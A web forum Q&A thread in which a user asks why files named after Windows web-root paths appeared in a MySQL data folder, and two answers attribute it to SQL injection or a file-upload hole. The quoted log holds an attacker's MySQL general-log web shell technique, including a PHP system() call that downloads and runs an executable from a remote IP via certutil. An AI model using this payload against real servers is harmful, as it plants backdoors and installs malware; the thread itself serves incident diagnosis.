Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
S
S
Snewer2019-01-10 03:44:08
MySQL
Snewer, 2019-01-10 03:44:08

Where did suspicious files in mysql data folder come from?

Hello!
I noticed suspicious PHP files in the MySQL data folder:
auto.cnf
ca-key.pem
ca.pem
C:AppServwwwindex.php
client-cert.pem
client-key.pem
C:phpStudyPHPTutorialWWWindex.php
C:phpStudyWWWindex.php
C:PHPTutorialWWWindex. php
C:xampphtdocsindex.php
D:phpStudyPHPTutorialWWWindex.php
D:phpStudyWWWindex.php
D:PHPTutorialWWWindex.php
E:phpStudyPHPTutorialWWWindex.php
E:phpStudyWWWindex.php
E:PHPTutorialWWWindex.php
ib_buffer_pool
ibdata1
ib_logfile0
ib_logfile1 ibtmp1 mysql.peschema
private key
public_key.pem
server-cert.pem
server-key.pem
sys
Example content:

2018-12-23T08:01:47.597864Z     11192 Query     SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
2018-12-23T08:01:47.799769Z     11192 Query     set global general_log='on'
2018-12-23T08:01:47.985474Z     11192 Query     SET global general_log_file='C:\xampp\htdocs\index.php'

What can you say about this? Thank you.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
M
Maxim Grishin, 2019-01-10
@vesper-bot

You have a certain element on your website that allows you to upload files, they tried to break it by uploading a shell or a backdoor, but they couldn’t find the path where to upload it normally (or one of the directories open for writing in the web server settings points to the database directory, most likely both). You were saved by the fact that your server is on Linux, and the attacker was trying to break Windows. Perhaps your phpmyadmin component was hacked (for example, they picked up a password). In general, ass to the site, re-upload the content, update the engine and back up the database, and carefully look at the web server config so that there are no extraneous directories in it, which, in principle, should not shine outside.

Report
B
Boris Korobkov, 2019-01-10
@BorisKorobkov

Your site has SQL injection. The attackers have already received full access to the database, now they are trying to flood the backdoor.

Similar questions
R
Rooly2021-03-23 11:40:40
How to properly organize apiResource Laravel? 2Reply
T
Timofey Belousov2015-05-12 23:15:48
Where and how to convert a png file to cur? To set the cursor on the site? 5Reply
R
Rostyk Ice2015-05-16 22:23:57
How to restore scripts in Tampermonkey with only the old Chrome folder? 3Reply
V
viktorross2019-11-09 23:29:52
How to make a record in 2 mysql tables? 2Reply
U
Udee Mo2021-05-16 14:36:06
How to call functions in ternary operator? 3Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question